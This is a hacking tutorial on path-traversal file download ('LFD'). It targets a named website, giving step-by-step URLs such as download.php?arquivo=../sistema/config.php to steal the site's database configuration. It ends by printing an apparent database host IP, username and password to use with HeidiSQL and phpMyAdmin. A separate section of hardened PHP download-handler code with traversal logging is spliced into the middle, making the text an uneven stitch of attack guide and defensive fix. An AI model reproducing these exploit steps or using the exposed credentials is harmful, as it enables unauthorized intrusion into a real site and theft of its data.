LFD(Local File Dislocation)

Hack Using LFD, Hack Config Entry, How To Hack Config Data, Website Hacking Using LFD
What Is LFD:-

In Local File Dislocation, an attacker is able to download the config.php (database) file, steal the DB password, user name, database name and host name from it, connect to the database using some software (HeidiSQL), and then log in to phpMyAdmin.



In Local File Dislocation the URL shows the web server directory (that is the vulnerable section).
Ex:-

www.site.com/download.php?arquivo=/home/mturbina2/public_html/sistema/apresentacao.pdf



OK, let's start. I have a website; let's try to download its config file:-



Target:-www.mturbina.com.br/site/download.php?arquivo=/home/mturbina2/public_html/sistema/produtos/kaindl/000000011/pdf/apresentacao.pdf



Step:-1 Copy and paste the target URL into the web browser's URL bar and hit Enter.

Step:-2 When we hit Enter, one file is downloaded. This file is useless; we only need to download index.php and config.php.



Step:-3 Remove the whole URL section after (download.php?arquivo=), or remove the URL after (=/home/mturbina2/public_html/). Follow either one of the two; I follow the first.

Ex:- (the URL now looks like this) www.mturbina.com.br/site/download.php?arquivo=



Step:-4 Put (../index.php) after the ?arquivo= part. The ../ is used for directory jumping, i.e. going back one directory on the server. Sometimes we use (../../../../../../../index.php), more than one level, to reach the correct location.

(But on this site we do not need to jump to another location, so we do not need to put (../).)

Ex:- Now the URL looks like this:- http://www.mturbina.com.br/site/download.php?arquivo=index.php

You can see the index.php file start downloading (download it).



Step:-5 Open the downloaded file (index.php) in Notepad.

Using this (index.php) we find out the location of the config.php (database connection) file.

We successfully find the location of the config file ("../sistema/config.php").



Step:-6 Now download the (../sistema/config.php) file and connect to the database.

Ex:- http://www.mturbina.com.br/site/download.php?arquivo=../sistema/config.php
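What makes a download.php like this exploitable is that the value of arquivo goes straight to the file system without being confined to one directory, so both absolute paths and ../ segments resolve. The following is an added example, not the site's own code, of how such a handler is hardened and how rejected requests are logged for detection; the download root and the PDF-only allow list are assumptions for the example.

```php
<?php
// Added example (not the original site's code): hardened download.php?arquivo=... handler.
// DOWNLOAD_ROOT is a placeholder path assumed for this example.
declare(strict_types=1);

const DOWNLOAD_ROOT = '/home/example/public_html/sistema/produtos';
const ALLOWED_EXT   = ['pdf'];

function resolveDownloadPath(string $root, string $requested): ?string
{
    // Reject empty names, NUL bytes and absolute paths outright: none is a legitimate request.
    if ($requested === '' || strpos($requested, "\0") !== false || $requested[0] === '/') {
        return null;
    }
    $rootReal  = realpath($root);
    $candidate = realpath($root . '/' . $requested);
    if ($rootReal === false || $candidate === false) {
        return null;            // root missing or requested file does not exist
    }
    // realpath() collapses ../ segments and symlinks; the result must still sit below $root.
    if (strncmp($candidate, $rootReal . DIRECTORY_SEPARATOR, strlen($rootReal) + 1) !== 0) {
        return null;            // resolved outside the download root, e.g. ../sistema/config.php
    }
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!is_file($candidate) || !in_array($ext, ALLOWED_EXT, true)) {
        return null;            // only regular files with an allow-listed extension are served
    }
    return $candidate;
}

$requested = $_GET['arquivo'] ?? '';
$path = resolveDownloadPath(DOWNLOAD_ROOT, $requested);
if ($path === null) {
    // Log the rejected value so traversal attempts show up in the error log for review.
    error_log(sprintf('download.php: rejected arquivo=%s from %s',
        $requested, $_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    http_response_code(404);
    exit;
}
header('Content-Type: application/pdf');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . (string) filesize($path));
readfile($path);
```

With this check in place, a request for ../sistema/config.php resolves to a path outside DOWNLOAD_ROOT and is refused with a 404 and a log line, while apresentacao.pdf inside the root is still served.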



Step:-7 Open HeidiSQL (download here: http://www.heidisql.com/download.php) and enter the database details into it.

Config entry for HeidiSQL (located in the config file):-
Db_Hostname=179.188.16.14
DbUser=mturbina2
DbPass=turbina72

